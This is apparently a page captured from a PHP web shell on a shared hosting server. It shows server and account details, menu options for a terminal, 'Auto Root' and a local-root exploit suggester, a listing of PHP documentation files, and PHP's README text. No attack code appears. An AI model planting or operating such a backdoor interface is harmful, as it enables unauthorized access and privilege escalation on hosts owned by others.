Linux res4.skyhost.pk 4.18.0-553.158.1.el8_10.x86_64 #1 SMP Wed Aug 26 03:18:33 EDT 2026 x86_64
LiteSpeed
Server IP : 65.109.66.33 & Your IP : 216.73.217.126
Domains : 334 Domain
User : supercareproduct
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
alt-php73-common /
Delete
Unzip
Name
Size
Permission
Date
Action
CODING_STANDARDS
12.43
KB
-rw-r--r--
2021-11-16 11:18
CREDITS
93
B
-rw-r--r--
2021-11-16 11:18
INSTALL
105
B
-rw-r--r--
2021-11-16 11:18
LICENSE
3.13
KB
-rw-r--r--
2021-11-16 11:18
NEWS
92.14
KB
-rw-r--r--
2021-11-16 11:18
README.EXT_SKEL
1.35
KB
-rw-r--r--
2021-11-16 11:18
README.GIT-RULES
5.16
KB
-rw-r--r--
2021-11-16 11:18
README.MAILINGLIST_RULES
3.35
KB
-rw-r--r--
2021-11-16 11:18
README.NEW-OUTPUT-API
5.05
KB
-rw-r--r--
2021-11-16 11:18
README.PARAMETER_PARSING_API
7.64
KB
-rw-r--r--
2021-11-16 11:18
README.REDIST.BINS
24.16
KB
-rw-r--r--
2021-11-16 11:18
README.RELEASE_PROCESS
15.32
KB
-rw-r--r--
2021-11-16 11:18
README.SELF-CONTAINED-EXTENSIONS
4.87
KB
-rw-r--r--
2021-11-16 11:18
README.STREAMS
14.95
KB
-rw-r--r--
2021-11-16 11:18
README.SUBMITTING_PATCH
7.93
KB
-rw-r--r--
2021-11-16 11:18
README.TESTING
11.36
KB
-rw-r--r--
2021-11-16 11:18
README.UNIX-BUILD-SYSTEM
4.16
KB
-rw-r--r--
2021-11-16 11:18
README.WIN32-BUILD-SYSTEM
114
B
-rw-r--r--
2021-11-16 11:18
README.input_filter
5.19
KB
-rw-r--r--
2021-11-16 11:18
README.md
1.57
KB
-rw-r--r--
2021-11-16 11:18
TSRM_LICENSE
1.28
KB
-rw-r--r--
2021-11-16 11:18
ZEND_LICENSE
2.74
KB
-rw-r--r--
2021-11-16 11:18
php.ini-development
69.7
KB
-rw-r--r--
2021-11-16 11:18
php.ini-production
69.88
KB
-rw-r--r--
2021-11-16 11:18
Save
Rename
The PHP Interpreter =================== This is the github mirror of the official PHP repository located at https://git.php.net. [](http://travis-ci.org/php/php-src) [](https://ci.appveyor.com/project/php/php-src) Pull Requests ============= PHP accepts pull requests via github. Discussions are done on github, but depending on the topic can also be relayed to the official PHP developer mailing list internals@lists.php.net. New features require an RFC and must be accepted by the developers. See https://wiki.php.net/rfc and https://wiki.php.net/rfc/voting for more information on the process. Bug fixes **do not** require an RFC, but require a bugtracker ticket. Always open a ticket at https://bugs.php.net and reference the bug id using #NNNNNN. Fix #55371: get_magic_quotes_gpc() throws deprecation warning After removing magic quotes, the get_magic_quotes_gpc function caused a deprecate warning. get_magic_quotes_gpc can be used to detected the magic_quotes behavior and therefore should not raise a warning at any time. The patch removes this warning We do not merge pull requests directly on github. All PRs will be pulled and pushed through https://git.php.net. Guidelines for contributors =========================== - [CODING_STANDARDS](/CODING_STANDARDS) - [README.GIT-RULES](/README.GIT-RULES) - [README.MAILINGLIST_RULES](/README.MAILINGLIST_RULES) - [README.RELEASE_PROCESS](/README.RELEASE_PROCESS)